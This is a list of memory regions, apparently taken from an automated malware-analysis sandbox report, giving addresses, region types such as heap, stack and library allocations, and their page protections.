|
||
|
11A0000
|
unkown
|
page readonly
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
7F8A000
|
heap
|
page read and write
|
||
|
B40000
|
unkown
|
page readonly
|
||
|
214FB1D9000
|
heap
|
page read and write
|
||
|
BCA000
|
stack
|
page read and write
|
||
|
15C8BC21000
|
trusted library allocation
|
page read and write
|
||
|
1FEBE050000
|
heap
|
page read and write
|
||
|
214FD09A000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
1F92F36A000
|
heap
|
page read and write
|
||
|
56869FE000
|
stack
|
page read and write
|
||
|
39F0000
|
unclassified section
|
page execute and read and write
|
||
|
3427000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34A0C000
|
trusted library allocation
|
page read and write
|
||
|
EFC000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF33000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8A0F0000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
B91000
|
heap
|
page read and write
|
||
|
1FEA6208000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
unkown
|
page readonly
|
||
|
1FEA78F5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page read and write
|
||
|
214FB18C000
|
heap
|
page read and write
|
||
|
214FB0B0000
|
heap
|
page read and write
|
||
|
1160000
|
unkown
|
page readonly
|
||
|
A504000
|
system
|
page read and write
|
||
|
77E000
|
stack
|
page read and write
|
||
|
1FEA3FE4000
|
heap
|
page read and write
|
||
|
1FEB6669000
|
trusted library allocation
|
page read and write
|
||
|
1FEBDDB4000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
1720000
|
unkown
|
page readonly
|
||
|
7F9B000
|
heap
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page execute and read and write
|
||
|
1FEB5C51000
|
trusted library allocation
|
page read and write
|
||
|
2D00000
|
unkown
|
page readonly
|
||
|
3102000
|
unkown
|
page execute and read and write
|
||
|
1FEA5C20000
|
heap
|
page execute and read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
1FEBDF40000
|
heap
|
page read and write
|
||
|
7FFD34726000
|
trusted library allocation
|
page execute and read and write
|
||
|
214FCFBF000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCF4E000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
15C8BB00000
|
trusted library allocation
|
page read and write
|
||
|
32A4000
|
heap
|
page read and write
|
||
|
15C89FA0000
|
heap
|
page read and write
|
||
|
7FFD3465D000
|
trusted library allocation
|
page execute and read and write
|
||
|
214FCF59000
|
heap
|
page read and write
|
||
|
1F915370000
|
heap
|
page read and write
|
||
|
1FEA75AD000
|
trusted library allocation
|
page read and write
|
||
|
214FD09A000
|
heap
|
page read and write
|
||
|
A99E8BE000
|
stack
|
page read and write
|
||
|
7F40000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
B84000
|
heap
|
page read and write
|
||
|
3078000
|
stack
|
page read and write
|
||
|
56859FE000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
338B000
|
heap
|
page read and write
|
||
|
54AC000
|
system
|
page execute and read and write
|
||
|
15C8A0CA000
|
heap
|
page read and write
|
||
|
1FEB5CC0000
|
trusted library allocation
|
page read and write
|
||
|
1F91730D000
|
trusted library allocation
|
page read and write
|
||
|
B91000
|
heap
|
page read and write
|
||
|
572F000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
7FFD34706000
|
trusted library allocation
|
page read and write
|
||
|
1FEA3ED7000
|
heap
|
page read and write
|
||
|
1080000
|
heap
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
214FCFC8000
|
heap
|
page read and write
|
||
|
A99E57E000
|
stack
|
page read and write
|
||
|
3481000
|
heap
|
page read and write
|
||
|
11D0000
|
unkown
|
page read and write
|
There are 964 hidden memdumps, click here to show them.